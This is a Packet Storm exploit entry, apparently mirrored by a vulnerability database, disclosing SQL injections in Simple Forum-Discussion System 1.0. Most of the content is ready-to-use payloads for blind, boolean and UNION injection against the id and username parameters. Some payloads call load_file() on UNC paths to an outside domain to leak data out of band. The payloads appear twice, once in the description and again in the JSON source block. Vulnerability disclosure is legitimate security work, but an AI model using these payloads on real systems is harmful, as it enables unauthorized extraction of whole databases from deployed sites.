Search...

Simple Forum-Discussion System 1.0 SQL Injection

2021-12-13T00:00:00

ID PACKETSTORM:165247
Type packetstorm
Reporter nu11secur1ty
Modified 2021-12-13T00:00:00

Description

                                        
                                            `## [Simple Forum-Discussion System  
1.0](https://www.sourcecodester.com/php/14525/simple-forumdiscussion-system-using-phpmysql-source-code.html)  
  
## [Vendor](https://www.sourcecodester.com/users/tips23)  
  
![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/Forum-Discussion-System-1.0/docs/forum.png)  
  
## Description:  
Multiple SQL-Injections are found on Simple Forum-Discussion System  
1.0 For example on three applications which are manage_topic.php,  
manage_user.php, and ajax.php. The attacker can be retrieving all  
information from the database of this system by using this  
vulnerability.  
  
  
[+]Payloads:  
  
```mysql  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=(select  
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))  
AND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 4 columns  
Payload: id=(select  
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))  
UNION ALL SELECT  
NULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL--  
-  
```  
  
  
```mysql  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own  
  
Type: time-based blind  
Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM  
(SELECT(SLEEP(5)))lewZ)&mtype=own  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 5 columns  
Payload: id=-6332 UNION ALL SELECT  
CONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL--  
-&mtype=own  
```  
  
  
```mysql  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=GnxaCRMw'+(select  
load_file('\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\fnu'))+''  
AND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND  
'eIbF'='eIbF&password=t4F!v8o!H8  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Forum-Discussion-System-1.0)  
  
## Proof and Exploit:  
[href](https://streamable.com/439w8c)  
  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:165247", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Simple Forum-Discussion System 1.0 SQL Injection", "description": "", "published": "2021-12-13T00:00:00", "modified": "2021-12-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/165247/Simple-Forum-Discussion-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-13T17:15:33", "viewCount": 30, "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:17E3FCD38AE400EE2E294AFDDAD88C3C", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:396115AAF7F0DCC45E594FBFCAFF0C1F", "THREATPOST:841F80E72D1DBEDE10E24C4077881D61"]}]}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/165247/sfds10-sql.txt", "sourceData": "`## [Simple Forum-Discussion System \n1.0](https://www.sourcecodester.com/php/14525/simple-forumdiscussion-system-using-phpmysql-source-code.html) \n \n## [Vendor](https://www.sourcecodester.com/users/tips23) \n \n![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/Forum-Discussion-System-1.0/docs/forum.png) \n \n## Description: \nMultiple SQL-Injections are found on Simple Forum-Discussion System \n1.0 For example on three applications which are manage_topic.php, \nmanage_user.php, and ajax.php. The attacker can be retrieving all \ninformation from the database of this system by using this \nvulnerability. \n \n \n[+]Payloads: \n \n```mysql \nParameter: id (GET) \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: id=(select \nload_file('\\\\\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\\\nix')) \nAND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb) \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 4 columns \nPayload: id=(select \nload_file('\\\\\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\\\nix')) \nUNION ALL SELECT \nNULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL-- \n- \n``` \n \n \n```mysql \nParameter: id (GET) \nType: boolean-based blind \nTitle: AND boolean-based blind - WHERE or HAVING clause \nPayload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM \n(SELECT(SLEEP(5)))lewZ)&mtype=own \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 5 columns \nPayload: id=-6332 UNION ALL SELECT \nCONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL-- \n-&mtype=own \n``` \n \n \n```mysql \nParameter: username (POST) \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: username=GnxaCRMw'+(select \nload_file('\\\\\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\\\fnu'))+'' \nAND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND \n'eIbF'='eIbF&password=t4F!v8o!H8 \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Forum-Discussion-System-1.0) \n \n## Proof and Exploit: \n[href](https://streamable.com/439w8c) \n \n \n \n`\n", "_state": {"dependencies": 1647589307, "score": 0}}